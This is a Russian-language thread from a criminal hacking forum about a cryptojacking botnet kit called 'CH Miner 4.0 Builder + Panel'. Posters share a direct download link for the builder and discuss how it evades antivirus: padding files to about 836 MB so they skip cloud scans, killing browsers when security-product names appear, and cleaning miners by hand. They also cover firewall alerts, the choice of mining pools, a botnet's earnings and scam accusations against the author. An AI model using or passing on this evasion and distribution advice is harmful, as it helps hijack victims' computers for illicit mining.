• XSS.stack #1 – первый литературный журнал от юзеров форума

malware CH Miner 4.0 Builder + Panel, Last stable version

Статус
Закрыто для дальнейших ответов.
Пожалуйста, обратите внимание, что пользователь заблокирован
Меня одного в непонимания кинуло по какой причине вес майнера GPU/CPU 836-837 МБ
Майнеры что в архивах при установке как раз и весят по столько. Типо защита от ухода в облачные сканы и на ВТ

Какой пул под eth выбрать? Были ли случаи бана от нанопула? Чекаю репорты от ав, один крупный ботнет по xmr до сих пор жив и спокойно майнит 13 баксов в час.
hxxps://xmr.nanopool.org/account/49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa

Прокси оно вроде не юзает
hxxps://blogs.akamai.com/sitr/2021/03/another-golang-crypto-miner-on-the-loose.html

Последнее редактирование:
Какой пул под eth выбрать? Были ли случаи бана от нанопула? Чекаю репорты от ав, один крупный ботнет по xmr до сих пор жив и спокойно майнит 13 баксов в час.
hxxps://xmr.nanopool.org/account/49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa

Прокси оно вроде не юзает
hxxps://blogs.akamai.com/sitr/2021/03/another-golang-crypto-miner-on-the-loose.html
С такой мощью если не банят то можно спокойно юзать нанопул.

2,278,080.0 H/s это жесть канешь)​

Наверное тыщи 3-5 онлайна ботов у типа

Скачать: https://ispcloud.online/chminer/
Запускаем только на виртуалках! Ссылка прямая от автора.

Добавлен сканер в бесплатную версию, килит браузеры если обнаружит слово из списка, например: avast

photo_2021-05-06_19-30-57.jpg

Походу кинул на 100$ после перевода удалил с чата потер переписку и удалил меня, не ведемся позже блек напишу

ЗЫ. Наверно о краже ваших майнеров не зря говорили в чате )

Походу кинул на 100$ после перевода удалил с чата потер переписку и удалил меня, не ведемся позже блек напишу

ЗЫ. Наверно о краже ваших майнеров не зря говорили в чате )
Собрался покупать, автор говорит ты его сам бросил на 100$ попросил софт в перед. и дельнул все. А софт не имеет привязки. Кому верить ? стран

автор и так в бане за работу по ру... збс купил че.

Кстати, на фениксе при первом запуске алерт от фаервола. Можно ли его как нибудь пофиксить? Я думал -cdmport 0 поставить и все норм будет, ан нет.

Да ты наверно и есть автор просто под разными акками )
Логика ? Раз я выложил то я автор.
Кстати, на фениксе при первом запуске алерт от фаервола. Можно ли его как нибудь пофиксить? Я думал -cdmport 0 поставить и все норм будет, ан нет.
А че за феникс используешь? с оф. сайта? просто у меня такого нету. мб где тестил на пк стоит обязательная проверка какая то?
На канале у автора почищенные были майнеры, ток их наверное уже задрочили, я сам себе чищу.

Логика ? Раз я выложил то я автор.

А че за феникс используешь? с оф. сайта? просто у меня такого нету. мб где тестил на пк стоит обязательная проверка какая то?
На канале у автора почищенные были майнеры, ток их наверное уже задрочили, я сам себе чищу.
Официальный феникс + ручная чистка. Там даже если ориг феникс запустить все равно первый раз будет алерт. Обычная вин 10.

Запустил последнюю версию. Постоянно преустанавливаются майнеры. кто сталкивался? причем смотрю на за юзером, ни алертов, ни он сам ничего не закрывает и не открывает. Тестил на 5 компах. эдентичное поведение
Новый-точечный-рисунок.jpg

Запустил последнюю версию. Постоянно преустанавливаются майнеры. кто сталкивался? причем смотрю на за юзером, ни алертов, ни он сам ничего не закрывает и не открывает. Тестил на 5 компах. эдентичное поведениеПосмотреть вложение 22334
Параметры запуска скорее всего не правильные, вот он и крашится. А билд его снова пытается поднять.

Ну вот я удивляюсь персонажам в этой ветке :rolleyes: . Люди! что у вас с головой? Вот читаю я данную тему и уже даже не удивляюсь, столько написано по данному софту на данном борде, на соседних бордах, а толку НОЛЬ!!!! Откройте свои глаза, автор софта кидала, доказано 100100 раз на реальных аргументах, как вы бл***ть можете использовать софт кидалы? Больше того, как вы хотите заработать на этом софте? Если этот софт создавался изначально для кидка, Автор софта создал группу, в которой только написали об очередном кидке и он тупо ее закрыл. Вы реально верите что он именно вас не кинет? Б**ть, нету слов. Если вам не где девать трафик, то продайте его, если вы хотите заняться майнигом, то закажите себе софт, какой? Понимаю, что написать ТЗ сложно, не понимая что как работает, но инфы достаточно. Пообщайтесь с селлерами нормального майнера, найдите инфу о детектах, аллертах, на форумах аверов, потом найдите обходы и создайте свое ТЗ на основании своих желаний и пониманий. А все хотят чтобы взял бесплатный майнер от кидалы, запустил и деньги полились рекой. А потом плачь, у меня не работает, у меня не запускается, меня кинул на 100-200-300 баксов и так далее.

Ну вот я удивляюсь персонажам в этой ветке :rolleyes: . Люди! что у вас с головой? Вот читаю я данную тему и уже даже не удивляюсь, столько написано по данному софту на данном борде, на соседних бордах, а толку НОЛЬ!!!! Откройте свои глаза, автор софта кидала, доказано 100100 раз на реальных аргументах, как вы бл***ть можете использовать софт кидалы? Больше того, как вы хотите заработать на этом софте? Если этот софт создавался изначально для кидка, Автор софта создал группу, в которой только написали об очередном кидке и он тупо ее закрыл. Вы реально верите что он именно вас не кинет? Б**ть, нету слов. Если вам не где девать трафик, то продайте его, если вы хотите заняться майнигом, то закажите себе софт, какой? Понимаю, что написать ТЗ сложно, не понимая что как работает, но инфы достаточно. Пообщайтесь с селлерами нормального майнера, найдите инфу о детектах, аллертах, на форумах аверов, потом найдите обходы и создайте свое ТЗ на основании своих желаний и пониманий. А все хотят чтобы взял бесплатный майнер от кидалы, запустил и деньги полились рекой. А потом плачь, у меня не работает, у меня не запускается, меня кинул на 100-200-300 баксов и так далее.
Ну во первых про то что он кидок, лично я все читал, и не собираюсь использовать его софт. Во вторый, лично для себя хочу понять функционал и работу, а не лить ему еще бесплатных юзеров. У меня есть купленный софт который работает адекватно уже не первый год, и меня это устраивает. В этом по чистый интерес.

Да да не юзайте. Детекты лишний раз херите.

Ну во первых про то что он кидок, лично я все читал, и не собираюсь использовать его софт. Во вторый, лично для себя хочу понять функционал и работу, а не лить ему еще бесплатных юзеров. У меня есть купленный софт который работает адекватно уже не первый год, и меня это устраивает. В этом по чистый интерес.
Это не ПО - это полкая Х***ТА, работает только на кидалу

Это не ПО - это полкая Х***ТА, работает только на кидалу
хз, пользуюсь месяц уже почти как. 0.4 ETH за это время вывел + XMR не помню скок точно. 200 RVN. Софт проверял, не панель не билд на лево не стучали.

Статус
Закрыто для дальнейших ответов.
Верх